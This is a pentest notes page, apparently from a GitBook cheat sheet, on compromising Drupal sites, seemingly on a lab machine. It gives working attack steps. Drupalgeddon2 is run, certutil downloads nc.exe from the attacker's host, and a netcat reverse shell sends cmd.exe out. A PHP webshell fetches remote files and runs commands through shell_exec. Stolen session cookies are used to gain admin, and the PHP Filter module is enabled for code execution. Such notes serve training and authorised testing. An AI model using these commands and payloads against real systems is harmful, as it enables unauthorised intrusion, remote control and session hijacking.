Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Scan
  • drupscan
  • droopescan
  • drupalgeddon (msf)
  • drupalgeddon (no msf)
  • Serialization Vulnerability - 41564.php
  • Json Cookies
  • Dupal PHP Module
  • Webshell
  • Enumeration

Was this helpful?

  1. 04 WebApps

Drupal

PreviousContent Management (CMS)NextElastix FreePBX

Last updated 2 years ago

Was this helpful?

  • Open-source web content management framework written in PHP

Scan

nmap -sC -sV -oA output 10.x.x.x

80     IIS 7.5 drupal = Windows 2008 R2
135    rpc
49154  rpc
 
DirBuster found 'rest': /rest/ — 200

http://10.x.x.x  ..drupal

drupscan

  • Works but too old - last updated like 2013

  • github/tibillys

droopescan

  • Takes a long time to run

  • http://$IP/robots.txt

droopescan --help
droopescan scan drupal -u 10.x.x.x

version: 7.54        ..Interesting Results
Admin: Login page    ..But no exploits
Theme: seven
ctools, libraries,
image module

drupalgeddon (msf)

searchsploit drupal 7.5

drupalgeddon (no msf)

  • CVE-2018-7600

  • If you get a 'limited shell' you will need to upload nc.exe and do reverse shell

gem install highline
ruby drupalgeddon2.rb 10.x.x.x

nc -nvlp 4444
certutil -urlcache -split -f http://$MyIP/nc.exe
nc.exe -e cmd.exe $MyIP 4444

Serialization Vulnerability - 41564.php

  • Search and Download the php exploit

  • ippsec includes Custom phpCode for:

    • Uploading and Execution

    • Requires php-curl

  • Exploit will download json files that could have secrets

google drupal 7.54 exploits  ..found one
searchsploit drupal          ..found 7.x
searchsploit -x 41564.php    ..view
searchsploit -p 41564.php    ..clipboard
mv 41564.php drupal.php      ..move/rename

Confirm rest:
http://10.x.x.x/rest_endpoint  ..nothing
http://10.x.x.x/rest           ..ok
$url = 'http://10.x.x.x/'
$endpoint_path = '/rest_endpoint'    ..default/wrong
$endpoint_path = '/rest';            ..found by dirbuster

$phpCode = <<<'EOD'
<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload], file_get_contents("http://10.x.x.x:8000/" . $_REQUEST['fupload']));
 };
 if (isset($_REQUEST['fexec'])) {
  echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
 };
?>
EOD;

$file= [
        'filename' => 'ippsec.php',
        'data' => $phpCode
];
Exploit:
> php drupal.php

Json Cookies

  • Exploit will save json files locally

  • Check them for details, and session cookies to steal

  • Create a New Cookie, and you might get Admin

cat user.json      ..user/pass
cat session.json   ..session/admin/cookie

firefox > cookies manager+ (addon) > New Cookie
cat session.json
session_name = Name: xyz111
session_id   = Content: ddddd
<save>
http://10.x.x.x/   ..we are admin!!

Dupal PHP Module

  • If you can access Drupal:

    • Enable the PHP Filter

    • Create an Article that has PHP

Drupal > Modules > PHP Filter (enable) > save
Add Content > Create Article
Title: test
Body: <?php phpinfo(); ?>
Format: PHP Code
Preview ... we have code execution!

Webshell

  • Use the ippsec phpCode

  • Execute commands and upload

http://10.x.x.x/ippsec.php?fexec=dir
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=sc query state=all   ..denied

Enumeration

  • systeminfo will tell us the OS version and Patch level

  • Hotfix 'N/A' might mean we dont have access, or there are no patches

  • OS/Patch level will help us with KernelExploit

OS Ver: 6.1.7600 B/A Build 7600
Hotfix: N/A
Kernel Exploit

..Find Version

https://www.drupal.org
http://$IP/CHANGELOG.txt
https://github.com/dreadlocked/Drupalgeddon2